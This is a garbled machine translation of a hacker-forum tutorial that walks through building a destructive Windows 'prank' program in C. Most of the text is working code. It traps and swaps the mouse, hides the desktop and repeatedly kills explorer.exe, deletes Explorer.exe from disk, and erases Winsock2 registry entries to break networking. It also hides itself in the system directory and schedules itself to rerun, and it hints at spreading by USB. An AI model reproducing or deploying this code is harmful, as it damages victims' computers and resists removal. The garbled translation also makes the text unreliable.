佚名MYHACK58:6220065984Hooked on prank-vulnerability warning-the black bar safety net
PS. Today on hard disk search for things when there is such an article… Have been writing for a long time…forget the issue here…are fast becoming my hard disk a program on fossils… The program did not have any technology, we looked to play it, useful to take to go…
Want to write a destructive program long time, has been hanging not to achieve, in time and friends test Trojans when found a stuff, so it was decided to write out through the multifaceted combination of the first prank app just baked, today I give everybody to introduce mischief to achieve, in order to facilitate everyone to read, I will block description.
Control the mouse
Code:
void Mouse()
{
RECT Rect;
Rect. left=1 0;
Rect. top=1 0;
Rect. right=2 0;
Rect. bottom=2 0; //set lock region size
ClipCursor(&Rect); // lock the mouse, to limit the moving area
SwapMouseButton(TRUE); //swap left and right mouse buttons
}
[Ctrl+A Select All]
Jane simple single a few API calls to complete the task, this time the user has been unable to properly use the mouse, because the mouse is locked in top left a very small piece of area.
Hide desktop icons
Code:
void HDesk()
{
HWND hDesktop;
hDesktop = FindWindow(“ProgMan”, NULL); //get desktop handle
ShowWindow(hDesktop, SW_HIDE); //hide desktop icons
}
[Ctrl+A Select All]
Very simple, right, two put you on the desktop all the shortcuts to hide them. But this doesn’t scare advanced users, so think a more poisonous way to----kill the Explorer process, haha~~so on the screen what also have no. But the system will soon re-start the explorer process, what to do? Here think of the two approaches.
First way: use the Sleep()function, the interval of the inspection process whether the presence of the Explorer process, if there is killed.
Code:
void kprocess(const char *processname)
{
char *fengze;
DWORD processid[1 0 2 4],needed,processcount,io;
HANDLE hProcess;
HMODULE hModule;
char path[MAX_PATH] = “”,temp[2 5 6]; //define variables
EnablePrivilege(SE_DEBUG_NAME,TRUE); //elevate privileges
EnumProcesses(processid, sizeof(processid), &needed); //enumerate all the processes
processcount=needed/sizeof(DWORD); //calculate the number of processes
for (io=0;io<processcount;io++) //iterate through all processes
{
hProcess=OpenProcess(PROCESS_QUERY_INFORMATION |PROCESS_TERMINATE |PROCESS_VM_READ|PROCESS_VM_WRITE,false,processid[io]);
//Open process and get process handle
if (hProcess)
{
EnumProcessModules(hProcess, &hModule, sizeof(hModule), &needed);
// Enumerate the open process module
GetModuleFileNameEx(hProcess, hModule, path, sizeof(path));
// Get Module File name contains the path
GetShortPathName(path,path,2 5 6);
//The long file name into a short file name
itoa(processid[io],temp,1 0); //convert to string
if((fengze=strstr(path,processname)))
//In process path to find whether it contains the relevant characters
{
TerminateProcess(hProcess,0); //if there is End Process
}
else
CloseHandle(hProcess); //close open process
}
}
EnablePrivilege(SE_DEBUG_NAME,FALSE); //restore permissions
}
Enhance and restore the permissions function
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(! OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0; //Open the process Token Ring
if(! LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1; //modify process privileges
tp. PrivilegeCount = 1; //assigned to the present process privileges
tp. Privileges[0]. Luid = luid;
tp. Privileges[0]. Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
//Notify Windows To modify the present process permissions
CloseHandle(hToken); return 0;
}
Use the GOTO statement to achieve the cycle
void monitor()
{
char *tha=“Explorer”; char *thb=“explorer”;
//Here the definition of 2 is because the system in the recovery after the process name at the beginning it becomes lowercase.
bg: kprocess(tha);
kprocess(thb); //kill process
Sleep(3 0 0 0); //the program sleep 3 seconds, so that the program of the CPU use is also reduced.
Goto bg ;
}
[Ctrl+A Select All]
The above is a cycle to achieve the purpose, here are a method is to kill processes, find Explorer. exe and remove, so that the system will jump out a dialog box ask to insert the installation disc for recovery, if this time we turn off the computer while Oh~~and then into the system when it does not show anything. We should also be on the Task Manager, IE and CMD there are some other processes for killing, so as to ensure our own is not the user to kill.
Note:#include “PSAPI. H” //program needs the header file
#pragma comment( lib, “PSAPI. LIB” ) //the program needs the library files
The following is a search file function:
Code:
int viewfiles(char *directory)
{
WIN32_FIND_DATA fdFindData;
HANDLE hFind;
char *filename;
int count=0;
BOOL done;
filename=new char[strlen(directory)+5]; //give the filename assigned directory+5 Space
strcpy(filename,directory); //the directory of characters copied to the filename
strcat(filename,“\\.”); //The filename with the\\. Connection
hFind=FindFirstFile(filename,&fdFindData);
//Based on filename to find a file, returns the search handle to hFind
delete[] filename; //release the memory
done=hFind!= INVALID_HANDLE_VALUE;
while(done)
{
if(strcmp(fdFindData. cFileName,“.”) && strcmp(fdFindData. cFileName,“…”))
//Determine the current directory or the parent directory
{
filename=new char[strlen(directory)+strlen(fdFindData. cFileName)+2];
// To the filename assigned space
strcpy(filename,directory); //the directory to copy to the filename
strcat(filename,"\"); //the filename with“\\”
strcat(filename,fdFindData. cFileName); //filename plus the file name
if((fdFindData. dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY)==FILE_ATTRIBUTE_DIRECTORY)
//If found is a directory, then enter the directory recursively
count+=viewfiles(filename);
else
if(strstr(fdFindData. cFileName,“Explorer.exe”)) //determine whether to find the file
{
count++; //to find the file count
DeleteFile(filename); //remove the textMember
}
delete[] filename; //release the memory
}
done=FindNextFile(hFind,&fdFindData); //find the next file
}
FindClose(hFind);
return(count);
}
[Ctrl+A Select All]
This function off with time as long as the specified one partition on it, of course you can also use a loop to traverse all partitions, quack~~be venomous to it.
Control drive
Code:
void Dfind()
{
int i;
UINT type;
char name;
char Dname[1 2 8];
for (name=‘A’;name<=‘Z’;name++) //traverse all drives
{
Dname[0]=name; Dname[1]=‘:’; Dname[2]=‘\'; Dname[3]=’\0’;
type = GetDriveType(Dname); //determine the drive type
if (type==DRIVE_CDROM)
{ //If it is the drive will open
mciSendString(“Set cdAudio door open wait”, NULL, 0, NULL);
mciSendString(“Set cdAudio door closed wait”, NULL, 0, NULL);
}
}
}
[Ctrl+A Select All]
Then add a loop, stop the switch drive, so the winning of friends certainly surprised.
Modifying the registry
Operation of the registry examples of many, many more, you can go to find, here I’ll introduce a thing.
Code:
void regdel()
{
HKEY hkresult;
LPCTSTR data=“SYSTEM\\CurrentControlSet\\Services\\WinSock2\\SPI5. 0\\Catalog_Entries”;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,
data, 0, KEY_ALL_ACCESS, &hkresult );
RegDeleteKey(hkresult,“0 0 0 0 0 0 0 0 0 0 0 1”); RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 0 2”);
RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 0 3”);
…
RegDeleteKey( hkresult,“0 0 0 0 0 0 0 0 0 0 1 5”);
}
[Ctrl+A Select All]
The above remove registry operation, the computer does not appear abnormal, but also can log on to the network, but the QQ landing does not go up, IE can not access the site…
With the above operation, believed to be the mark of the friend fainted~~, just have damage is also not enough, we also want to ensure that your program can survive. So I thought lets copy the program and hidden himself.
Code:
void filehidden()
{
UINT type;
char name;
char Dname[4];
char LPath[MAX_PATH];
char SysPath [MAX_PATH];
GetModuleFileName(NULL,LPath,MAX_PATH);
//Get the current file path
SetFileAttributes(LPath,FILE_ATTRIBUTE_HIDDEN
+FILE_ATTRIBUTE_SYSTEM);
//The file set to hidden and system attributes
GetSystemDirectory(SysPath,MAX_PATH);
strcat(SysPath,“\\黑色 天空 .exe”);
CopyFile(LPath,SysPath,FALSE); //copy to the specified path
}
[Ctrl+A Select All]
We can also use the front control drive that section of code to change the look, the program is copied to the U disk or other computer external can be written on the disc, to achieve the purpose of communication, to achieve it is very simple, just left to your own to complete it.
Now we have a file to hide it, and how to start this program? The registry? No, we still use a system of scheduled task bar, use the system comes with AT. exe program? No! Our own write:)
Code:
void Jobadd(char * SysPath) //file path we are free from the above program to get
{
DWORD JobId;
AT_INFO ai;
long Len;
WCHAR szFilePath[2 5 6];
memset(&ai,0,sizeof(ai));
Len=MultiByteToWideChar(CP_ACP,0,SysPath,strlen(SysPath),
szFilePath,sizeof(szFilePath));
szFilePath[Len] = ‘\0’;
//The path is converted into Unicode code
ai. Command=szFilePath;
ai. DaysOfMonth=0;
ai. DaysOfWeek=0x60;
ai. Flags=JOB_RUN_PERIODICALLY;
ai. JobTime=1 16 06 01 0 0 0+5 06 0*1 0 0 0;
//Give ai a structure variable, each member of the assignment
NetScheduleJobAdd(NULL,LPBYTE(&ai),&JobId);
//Call the API function to add scheduled task
}
[Ctrl+A Select All]
The above function will be in the task plan to add a weekly Saturday and Sunday, noon 1 1 points 5 0 the implementation of our specified program plan. But this relies on the Task Scheduler service, we directly call system()function to perform the Net Start Schedule command.
Note:#include <lmcons. h>
#include <lmat. h> //program needs the header file
#pragma comment(lib,“NETAPI32. LIB”) //the program needs the library files
Well, a basic introduction is over, if you feel still not perfect, then you can own then add a point what, don’t excessive Oh, the police uncle to buy you a Cup of coffee.